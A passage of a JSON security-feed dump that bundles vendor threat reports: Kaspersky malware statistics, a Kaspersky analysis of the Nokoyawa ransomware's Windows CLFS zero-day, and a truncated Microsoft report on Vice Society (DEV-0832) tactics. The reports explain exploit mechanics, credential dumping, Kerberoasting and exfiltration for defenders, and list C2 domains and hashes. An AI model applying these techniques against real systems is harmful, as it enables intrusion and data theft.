\n8 | Bangladesh | 37.90 \n9 | Myanmar | 36.97 \n10 | South Sudan | 36.60 \n11 | Syria | 35.60 \n12 | Burundi | 34.88 \n13 | Rwanda | 33.69 \n14 | Algeria | 33.61 \n15 | Benin | 33.60 \n16 | Tanzania | 32.88 \n17 | Malawi | 32.65 \n18 | Venezuela | 31.79 \n19 | Cameroon | 31.34 \n20 | Chad | 30.92 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025948/13-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\nOn average worldwide, Malware-class local threats were registered on 14.65% of users' computers at least once during Q2. Russia scored 16.66% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-15T12:00:43", "type": "securelist", "title": "IT threat evolution in Q2 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2021-44228", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1097", "CVE-2022-1364", "CVE-2022-1529", "CVE-2022-1802", "CVE-2022-22965", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24521", "CVE-2022-26809", "CVE-2022-26925", "CVE-2022-28281", "CVE-2022-30190"], "modified": "2022-08-15T12:00:43", "id": "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "href": "https://securelist.com/it-threat-evolution-in-q2-2022-non-mobile-statistics/107133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-15T18:19:57", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/22105659/programming-code-abstract-990x400.jpg)\n\n**Updated April 20, 2023**\n\nIn February 2023, Kaspersky technologies detected a number of attempts to execute similar elevation-of-privilege exploits on Microsoft Windows servers belonging to small and medium-sized businesses in the Middle East, in North America, and previously in Asia regions. These exploits were very similar to already known [Common Log File System (CLFS)](<https://en.wikipedia.org/wiki/Common_Log_File_System>) driver exploits that we analyzed previously, but we decided to double check and it was worth it \u2013 one of the exploits turned out to be a zero-day, supporting different versions and builds of Windows, including Windows 11. The exploit was highly obfuscated with more than 80% of the its code being "junk" elegantly compiled into the binary, but we quickly fully reverse-engineered it and reported our findings to Microsoft. Microsoft assigned CVE-2023-28252 to the Common Log File System elevation-of-privilege vulnerability, and a patch was released on April 11, 2023, as part of April Patch Tuesday.\n\nWhile the majority of zero-days that we've discovered in the past were used by APTs, this particular zero-day was used by a sophisticated cybercrime group that carries out ransomware attacks. This group is notable for its use of a large number of similar but unique Common Log File System (CLFS) driver exploits that were likely developed by the same exploit author. Since at least June 2022, we've identified five different exploits used in attacks on retail & wholesale, energy, manufacturing, healthcare, software development and other industries. Using the CVE-2023-28252 zero-day, this group attempted to deploy the Nokoyawa ransomware as a final payload. \n[![Nokoyawa ransom note](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/11115128/Nokoyawa_ransomware_attacks_with_Windows_zero-day_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/11115128/Nokoyawa_ransomware_attacks_with_Windows_zero-day_01.png>)\n\n**_Nokoyawa ransom note_**\n\n## Elevation-of-privilege exploit\n\nThe attacker must be authenticated with user access and have the ability to run code on the target system to launch the elevation-of-privilege exploit.\n\nCLFS is a log file subsystem that was first introduced in Microsoft Windows Server 2003 R2 / Microsoft Vista and is implemented in the clfs.sys driver. This file system can be used by any application and Microsoft provides an [API](<https://learn.microsoft.com/en-us/previous-versions/windows/desktop/clfs/common-log-file-system-api>) for it. Logs are created using the [CreateLogFile](<https://learn.microsoft.com/en-us/windows/win32/api/clfsw32/nf-clfsw32-createlogfile>) function - a log is made up of a base log file (.blf file name extension) that is a master file containing metadata, and a number of containers that hold the actual data. Containers are created using the [AddLogContainer](<https://learn.microsoft.com/en-us/windows/win32/api/clfsw32/nf-clfsw32-addlogcontainer>) and [AddLogContainerSet](<https://learn.microsoft.com/en-us/windows/win32/api/clfsw32/nf-clfsw32-addlogcontainerset>) functions. As you may already guess, the base log files are the most interesting to look at. But while Microsoft provides an API for working with them, their file format is undocumented, and developers should interact with them only through the CLFS API. The file structure of base log files, when viewed briefly in a hex editor, does not seem very complicated, and Microsoft provides debug symbols for clfs.sys, so with a sufficient level of enthusiasm this format can be reverse engineered (already [done](<https://github.com/ionescu007/clfs-docs>) by Alex Ionescu). A glance at the structure of base log files instantly raises a red flag \u2013 the file consists of kernel structures as it is, and there are even fields for storing memory pointers! Combine that with the fact that, according to the API documentation, this technology is quite complicated, plus it was developed a long time ago, and we have a large number of vulnerabilities as a result. Searching for "Windows Common Log File System Driver Elevation Of Privilege Vulnerability" shows that there have been at least thirty-two such vulnerabilities (not counting CVE-2023-28252) discovered since 2018, where three of them were detected in the wild as zero-days (CVE-2022-24521, CVE-2022-37969, CVE-2023-23376).\n\nCVE-2023-28252 is an out-of-bounds write (increment) vulnerability that can be exploited when the system attempts to extend a metadata block. The vulnerability is triggered by manipulating a base log file. At this time, we will not share the names of the fields or exact values that should be written to the file in order to trigger the vulnerability, as that information could facilitate further exploitation. This is to ensure that everyone has enough time to patch their systems before other actors develop their own exploits for CVE-2023-28252. Instead, we will share some general information about the vulnerability and the way of exploiting it. \n\nThe vulnerability is triggered in the CClfsBaseFilePersisted::ExtendMetadataBlock function when this function is executed with a call to the AddLogContainer API function. There is a condition for CClfsBaseFilePersisted::ExtendMetadataBlock function to be executed, and the base log file needs to be modified for that to happen. Besides, various fields in the CONTROL and CONTROL_SHADOW metadata blocks need to be patched. The exploit modifies LogBlockHeader->ValidSectorCount and various fields in LogBlockHeader->Record[0] for both the CONTROL and CONTROL_SHADOW metadata blocks. As a result of these changes, the CClfsBaseFilePersisted::ExtendMetadataBlock function performs out-of-bounds access to the m_rgBlocks array, which contains only six elements. After that, the CClfsBaseFilePersisted::WriteMetadataBlock function will proceed to use the retrieved value from the m_rgBlocks array as a pointer to the _CLFS_LOG_BLOCK_HEADER structure to increment LogBlockHeader->Record[0]->DumpCount and LogBlockHeader->Usn. This can be used to corrupt a kernel object in the memory and obtain kernel read/write privileges if the address of the desired victim object is sprayed in the right location in the memory.\n\nThe discovered exploit uses the vulnerability to corrupt another specially crafted base log file object in a way that a fake element of the base log file gets treated as a real one. _CLFS_CONTAINER_CONTEXT is an example of the structure that gets stored in base log files, but contains a field for storing a kernel pointer. Of course, the value of this field is ignored when the structure is read from the base log file on disk, but changing in memory the offset pointing to the valid _CLFS_CONTAINER_CONTEXT structure into an offset pointing to a specially crafted malicious _CLFS_CONTAINER_CONTEXT structure makes it possible to provide a pointer to a controlled memory in a user level and obtain kernel read/write privileges with it.\n\nThe exploit leaks the addresses of kernel objects to achieve stable exploitation. This is done using the NtQuerySystemInformation function \u2013 a technique that we previously saw in other zero-days (e.g. [PuzzleMaker](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>), [MysterySnail](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) APT cases). The information classes used by the exploit require Medium IL to work.\n\nWe believe that CVE-2023-28252 could have been easily discovered with the help of fuzzing. But there are already so many vulnerabilities found in this component, so if it's discoverable by fuzzing, why has it not been found before? We have a possible explanation. Examining the clfs.sys driver code in disassembler shows extensive use of try/catch blocks to catch exceptions. In many parts of the code when an exception occurs it gets masked by an exception handler and the code continues its normal execution like nothing happened. We verified that with CVE-2023-28252 a possible access violation that follows after triggering the vulnerability is masked by an exception handler. This makes us think that previously fuzzers were actually hitting this vulnerability, but because there was no crash it continued to be undiscovered. For effective fuzzing, it's necessary to keep in mind the possibility of such a scenario and to take steps to prevent it.\n\n## Post exploitation and malware\n\nWe see that the main purpose of using elevation-of-privilege exploits was to dump the contents of the HKEY_LOCAL_MACHINE\\SAM registry hive.\n\nAs for the malware, attackers use Cobalt Strike BEACON as their main tool. It's launched with a variety of custom loaders aimed to prevent AV detection.\n\nIn some of the other attacks that we attribute to the same actor, we also observed that, prior to exploiting the CLFS elevation-of-privilege vulnerability, the victim's machines were infected with a custom modular backdoor named "Pipemagic" that gets launched via an MSBuild script. At the end of last year, we published a private report about this malware for customers of the Kaspersky Intelligence Reporting service.\n\nIn attacks using the CVE-2023-28252 zero-day, this group attempted to deploy Nokoyawa ransomware as a final payload. Yearly variants of Nokoyawa were just "rebranded" variants of JSWorm ransomware, which we wrote about [previously](<https://securelist.com/evolution-of-jsworm-ransomware/102428/>). In this attack, cybercriminals used a newer version of Nokoyawa that is quite distinct from the JSWorm codebase. It's written in C and has encrypted strings. It was launched with an encrypted json config provided with a "-config" command line argument.\n\n[![Decrypted and formatted config of Nokoyawa ransomware](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/10115431/Nokoyawa_ransomware_attacks_with_Windows_zero-day_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/10115431/Nokoyawa_ransomware_attacks_with_Windows_zero-day_02.png>)\n\n**_Decrypted and formatted config of Nokoyawa ransomware_**\n\n## Conclusions\n\nWe see a significantly increasing level of sophistication among cybercriminal groups. We don't often see APTs using zero-day exploits in their attacks, and now there are financially motivated cybercriminal groups that have the resources to acquire exploits for unknown vulnerabilities and routinely use them in attacks. Moreover, there are developers willing to help cybercriminal groups and to produce one exploit after another.\n\nWe detect the CVE-2023-28252 exploit and related malware with the verdicts:\n\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * HEUR:Trojan-Ransom.Win32.Generic\n * Win64.Agent*\n\nKaspersky products detected these attacks with the help of the Behavioral Detection Engine and the Exploit Prevention component. CVE-2023-28252 is the latest addition to the long list of zero-days discovered in the wild with the help of our technologies. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone.\n\nMore information about this and related attacks is available to customers of the Kaspersky Intelligence Reporting service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n_Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches._\n\n## Indicators of compromise\n\nAfter finishing, the exploit leaves files used for exploitation at the hard-coded path in the "C:\\Users\\Public\\" folder. Companies can check if the exploit was launched on their servers or employees' machines by looking for the presence of the "C:\\Users\\Public\\\\.container*", "C:\\Users\\Public\\MyLog*.blf", and "C:\\Users\\Public\\p_*" files.\n\n**Exploitation artifacts** \nC:\\Users\\Public\\\\.container* \nC:\\Users\\Public\\MyLog*.blf \nC:\\Users\\Public\\p_*\n\n**Exploit** \n[46168ed7dbe33ffc4179974f8bf401aa](<https://opentip.kaspersky.com/46168ed7dbe33ffc4179974f8bf401aa/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\n**CobaltStrike loaders** \n[1e4dd35b16ddc59c1ecf240c22b8a4c4](<https://opentip.kaspersky.com/1e4dd35b16ddc59c1ecf240c22b8a4c4/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[f23be19024fcc7c8f885dfa16634e6e7](<https://opentip.kaspersky.com/f23be19024fcc7c8f885dfa16634e6e7/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[a2313d7fdb2f8f5e5c1962e22b504a17](<https://opentip.kaspersky.com/a2313d7fdb2f8f5e5c1962e22b504a17/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\n**CobaltStrike C2s** \n[vnssinc[.]com](<https://opentip.kaspersky.com/vnssinc.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[qooqle[.]top](<https://opentip.kaspersky.com/qooqle.top/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[vsexec[.]com](<https://opentip.kaspersky.com/vsexec.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[devsetgroup[.]com](<https://opentip.kaspersky.com/devsetgroup.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\n**Nokoyawa ransomware** \n[8800e6f1501f69a0a04ce709e9fa251c](<https://opentip.kaspersky.com/8800e6f1501f69a0a04ce709e9fa251c/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-11T17:36:20", "type": "securelist", "title": "Nokoyawa ransomware attacks with Windows zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24521", "CVE-2022-37969", "CVE-2023-23376", "CVE-2023-28252"], "modified": "2023-04-11T17:36:20", "id": "SECURELIST:2A8910B73BBDBE37391EE4739A773C24", "href": "https://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2022-10-25T16:02:24", "description": "In recent months, Microsoft has detected active ransomware and extortion campaigns impacting the global education sector, particularly in the US, by a threat actor we track as DEV-0832, also known as Vice Society. Shifting ransomware payloads over time from [BlackCat](<https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/>), [QuantumLocker](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>), and [Zeppelin](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), DEV-0832\u2019s latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as _.v-s0ciety_, ._v-society_, and, most recently, _.locked_. In several cases, Microsoft assesses that the group did not deploy ransomware and instead possibly performed extortion using only exfiltrated stolen data.\n\nDEV-0832 is a cybercriminal group that has reportedly been active as early as June 2021. While the latest attacks between July and October 2022 have heavily impacted the education sector, DEV-0832\u2019s previous opportunistic attacks have affected various industries like local government and retail. Microsoft assesses that the group is financially motivated and continues to focus on organizations where there are weaker security controls and a higher likelihood of compromise and ransom payout. Before deploying ransomware, DEV-0832 relies on tactics, techniques, and procedures commonly used among other ransomware actors, including the use of PowerShell scripts, repurposed legitimate tools, exploits for publicly disclosed vulnerabilities for initial access and post-compromise elevation of privilege, and commodity backdoors like _SystemBC_.\n\nRansomware has evolved into a complex threat that\u2019s human-operated, adaptive, and focused on a wider scale, using data extortion as a monetization strategy to become even more impactful in recent years. To find easy entry and privilege escalation points in an environment, these attackers often take advantage of poor credential hygiene and legacy configurations or misconfigurations. Defenders can build a robust defense against ransomware by reading our [ransomware as a service blog](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>).\n\nIn this blog, we detail Microsoft\u2019s analysis of observed DEV-0832 activity, including the tactics and techniques used across the group\u2019s campaigns, with the goal of helping customers identify, investigate, and remediate activity in their environments. We provide hunting queries to help customers comprehensively search their environments for relevant indicators as well as protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\n## Who is DEV-0832 (Vice Society)?\n\nMicrosoft has identified multiple campaigns attributed to DEV-0832 over the past year based on the use of a unique PowerShell file name, staging directories, and ransom payloads and their accompanying notes. To gain an initial foothold in compromised networks, DEV-0832 has [reportedly exploited vulnerable web-facing applications and used valid accounts](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>). However, due to limited initial signals from affected organizations, Microsoft has not confirmed these attack vectors. Attackers then use custom PowerShell scripts, commodity tools, exploits for disclosed vulnerabilities, and native Windows binaries to gather privileged credentials, move laterally, collect and exfiltrate data, and deploy ransomware.\n\nAfter deploying ransomware, DEV-0832 demands a ransom payment, threatening to leak stolen data on the group\u2019s _[.]onion_ site. In some cases, Microsoft observed that DEV-0832 did not deploy ransomware. Instead, the actors appeared to exfiltrate data and dwell within compromised networks. The group sometimes avoids a ransomware payload in favor of simple extortion\u2014threatening to release stolen data unless a payment is made.\n\nThe group also goes to significant measures to ensure that an organization cannot recover from the attack without paying the ransom: Microsoft has observed DEV-0832 access two domain administrator accounts and reset user passwords of over 150,000 users, essentially locking out legitimate users before deploying ransomware to some devices. This effectively interrupts remediation efforts, including attempts to prevent the ransomware payload or post-compromise incident response.\n\n### Toolset\n\n#### Ransomware payloads\n\nMicrosoft has observed DEV-0832 deploy multiple commodity ransomware variants over the past year: BlackCat, QuantumLocker, Zeppelin, and most recently a Vice Society-branded variant of the Zeppelin ransomware. While many ransomware groups have shifted away from branded file extensions in favor of randomly generated ones, DEV-0832 incorporated branding with their Vice Society variant using _.v-s0ciety_ or _.v-society_ file extensions. Most recently in late September 2022, DEV-0832 again modified their ransomware payload to a variant dubbed RedAlert, using a _.locked_ file extension.\n\nIn one July 2022 intrusion, Microsoft security researchers identified DEV-0832 attempt to deploy QuantumLocker binaries, then within five hours, attempt to deploy suspected Zeppelin ransomware binaries. Such an incident might suggest that DEV-0832 maintains multiple ransomware payloads and switches depending on target defenses or, alternatively, that dispersed operators working under the DEV-0832 umbrella might maintain their own preferred ransomware payloads for distribution. The shift from a [ransomware as a service](<https://aka.ms/ransomware-as-a-service>) (RaaS) offering (BlackCat) to a purchased wholly-owned malware offering (Zeppelin) and a custom Vice Society variant indicates DEV-0832 has active ties in the cybercriminal economy and has been testing ransomware payload efficacy or post-ransomware extortion opportunities.\n\nIn many intrusions, DEV-0832 stages their ransomware payloads in a hidden share on a Windows system, for example accessed via a share name containing \u201c$\u201d. Once DEV-0832 has exfiltrated data, they then distribute the ransomware onto local devices for launching, likely using group policy, as shown in the below command:\n\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-1.-Group-policy-to-distribute-ransomware-onto-local-devices-1024x39.png)Figure 1. Group policy to distribute ransomware onto local devices\n\nThe group also has cross-platform capabilities: Microsoft identified the deployment of a Vice Society Linux Encryptor on a Linux ESXi server.\n\n#### PowerShell scripts\n\nDEV-0832 uses a PowerShell script to conduct a variety of malicious activities and make system-related changes within compromised networks. Like their ransomware payloads, DEV-0832 typically stages their PowerShell scripts on a domain controller.\n\nMicrosoft security researchers have observed several variations among identified DEV-0832 PowerShell scripts, indicating ongoing refinement and development over time\u2014while some only perform system discovery commands, other scripts are further modified to perform persistence, defense evasion, data exfiltration, and even distribute the ransomware payloads.\n\n#### Commodity tools\n\nAccording to Microsoft investigations, DEV-0832 has used two commodity backdoors in ransomware attacks: _SystemBC_ and _PortStarter_.\n\n_SystemBC_ is a post-compromise commodity remote access trojan (RAT) and proxy tool that has been incorporated into multiple diverse ransomware attacks. In one DEV-0832 intrusion, the attacker used both a compromised domain admin user account and a compromised contractor account to launch a PowerShell command that launched a _SystemBC_ session under the value name \u201csocks\u201d:\n\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-2.-Powershell-command-launching-a-SystemBC-session-named-\u2018socks-1024x53.png)Figure 2. Powershell command launching a SystemBC session named \u2018socks\u2019\n\n_PortStarte_r is a backdoor written in Go. According to Microsoft analysis, this malware provides functionality such as modifying firewall settings and opening ports to connect to pre-configured command-and-control (C2) servers.\n\nDEV-0832 has also deployed ransomware payloads using the remote launching tool Power Admin. Power Admin is a legitimate tool that provides functionality to monitor servers and applications, as well as file access auditing. If an organization has enabled Console Security settings within Power Admin, an attacker must have credentials to make authorized changes.\n\nOther commodity tools identified in DEV-0832 attacks include Advanced Port Scanner and Advanced IP Scanner for network discovery.\n\n#### Abuse of legitimate tooling\n\nLike many other ransomware actors, DEV-0832 relies on misusing legitimate system tools to reduce the need to launch malware or malicious scripts that automated security solutions might detect. Observed tools include:\n\n * Use of the [Windows Management Instrumentation Command-line](<https://learn.microsoft.com/windows/win32/wmisdk/wmic>) (WMIC) to launch commands that delete Mongo databases, other backups, and security programs.\n * Use of Impacket\u2019s WMIexec functionality, an open-source tool to launch commands via WMI, and Impacket _atexec.py_, which launches commands using Task Scheduler.\n * Use of the [vssadmin](<https://learn.microsoft.com/windows-server/administration/windows-commands/vssadmin>) command to delete shadow copy backups on Windows Server.\n * Use of [PsExec](<https://learn.microsoft.com/sysinternals/downloads/psexec>) to remotely launch PowerShell, batch scripts, and deploy ransomware payloads\n\nAdditionally, in one identified intrusion, DEV-0832 attempted to turn off Microsoft Defender Antivirus using registry commands. [Enabling Microsoft Defender Antivirus tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection>) helps block this type of activity.\n\n![table](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-3.-Registry-commands-that-attempt-to-tamper-with-Microsoft-Defender-antivirus-software.png)Figure 3. Registry commands that attempt to tamper with Microsoft Defender antivirus software\n\n### Harvesting privileged credentials for ransomware deployment\n\nLike other ransomware groups, after gaining an initial foothold within a network, DEV-0832 moves quickly to gather valid administrator local or domain credentials to ensure they can distribute ransomware payloads throughout the network for maximum impact.\n\n#### Credential dumps\n\nWhile Microsoft has not identified all the credential access techniques of DEV-0832, in many instances DEV-0832 accesses Local Security Authority Server Service (LSASS) dumps to obtain valid account credentials that were present in memory. Microsoft also observed that, instead of using a tool like Mimikatz to access a credential dump, DEV-0832 typically abuses the tool _comsvcs.dll_ along with MiniDump to dump the LSASS process memory. Other ransomware actors have been observed using the same technique. \n\nIn cases where DEV-0832 obtained domain-level administrator accounts, they accessed NTDS dumps for later cracking. The following command shows the attacker exfiltrating the _NTDS.dit_ file, which stores Active Directory data to an actor-created directory:\n\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-4.-Example-of-attacker-command-to-exfiltrate-the-\u2018NTDS.dit-file-1024x38.png)Figure 4. Example of attacker command to exfiltrate the \u2018NTDS.dit\u2019 file\n\n#### Kerberoast\n\nMicrosoft has also identified DEV-0832 used the malicious PowerSploit module [_Invoke-Kerberoast_](<https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/>) to perform a Kerberoast attack, which is a post-exploitation technique used to obtain credentials for a service account from Active Directory Domain Services (AD DS). The _Invoke-Kerberoast_ module requests encrypted service tickets and returns them in an attacker-specified output format compatible with cracking tools. The group can use the cracked Kerberos hashes to reveal passwords for service accounts, often providing access to an account that has the equivalent of domain admin privileges. Furthermore, one Kerberos service ticket can have many associated service principal names (SPNs); successful Kerberoasting can then grant an attacker access to the SPNs\u2019 associated service or user accounts, such as obtaining ticket granting service (TGS) tickets for Active Directory SPNs that would allow an attacker to do offline password cracking.\n\nCombined with the fact that service account passwords are not usually set to expire and typically remain unchanged for a great length of time, attackers like DEV-0832 continue to rely on Kerberoasting in compromised networks. Microsoft 365 Defender blocks this attack with Antimalware Scan Interface (AMSI) and machine learning. Monitor for alerts that reference Kerberoast attacks closely as the presence of these alerts typically indicates a human adversary in your environment.\n\n#### Account creation\n\nIn one suspected DEV-0832 intrusion, Microsoft observed an operator create accounts that, based on the naming convention, were designed to blend in as admin accounts and allow persistence without malware, as shown in the following command:\n\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/Figure-5.-Attacker-command-to-create-accounts.png)Figure 5. Attacker command to create accounts\n\nMonitoring newly created accounts can help identify this type of suspicious activity that does not rely on launching malware for persistence in the environment.\n\n#### Exploitation of privilege escalation vulnerabilities\n\nIn August 2022, Microsoft security researchers identified one file during a DEV-0832 intrusion indicating that the group has incorporated an exploit for the disclosed, patched security flaw [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) (Windows Common Log File System (CLFS) logical-error vulnerability). Microsoft released a patch in April 2022. The DEV-0832 file spawns a new _cmd.exe_ process with system privileges.\n\nAccording to public reporting, DEV-0832 has also incorporated exploits for the [PrintNightmare](<https://www.cisa.gov/uscert/ncas/alerts/aa22-249a>) vulnerability to escalate privileges in a domain. Combined with the CVE-2022-24521 exploit code, it is likely that DEV-0832, like many other adversaries, quickly incorporates available exploit code for disclosed vulnerabilities into their toolset to target unpatched systems.\n\n#### Lateral movement with valid accounts\n\nAfter gaining credentials, DEV-0832 frequently moves laterally within a network using Remote Desktop Protocol (RDP). And as previously mentioned, DEV-0832 has also used valid credentials to interact with remote network shares over Server Message Block (SMB) where they stage ransomware payloads and PowerShell scripts.\n\n### Data exfiltration\n\nIn one known intrusion, DEV-0832 operators exfiltrated hundreds of gigabytes of data by launching their PowerShell script, which was staged on a network share. The script contained hardcoded attacker-owned IP addresses and searched for wide-ranging, non-targeted keywords ranging from financial documents to medical information, while excluding files containing keywords such as varied antivirus product names or file artifact extensions. Given the wide range of keywords included in the script, it is unlikely that DEV-0832 regularly customizes it for each target.\n\nMicrosoft suspects that DEV-0832 uses legitimate tools Rclone and MegaSync for data exfiltration as well; many ransomware actors leverage these tools, which provide capabilities to upload files to cloud storage. DEV-0832 also uses file compression tools to collect data from compromised devices.\n\n## Mitigations\n\nApply these mitigations to reduce the impact of this threat:\n\n * Use [device discovery](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery>) to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n * Use [Microsoft Defender Vulnerability Management](<https://security.microsoft.com/vulnerabilities>) to assess your current status and deploy any updates that might have been missed.\n * Utilize [Microsoft Defender Firewall](<https://support.microsoft.com/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f>), intrusion prevention devices, and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [endpoint detection and response (EDR) in block mode](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * [LSA protection](<https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection>) is enabled by default on new Windows 11 devices, hardening the platform against credential dumping techniques. LSA PPL protection will further restrict access to memory dumps making it hard to obtain credentials.\n * Refer to Microsoft\u2019s blog [Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#defending-against-ransomware>) for recommendations on building strong credential hygiene and other robust measures to defend against ransomware.\n\nMicrosoft customers can turn on [attack surface reduction rules](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction>) to prevent several of the infection vectors of this threat. These rules, which can be configured by any administrator, offer significant hardening against ransomware attacks. In observed attacks, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * [Block process creations originating from PsExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Use advanced protection against ransomware](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#use-advanced-protection-against-ransomware>)\n * [Block credential stealing from the 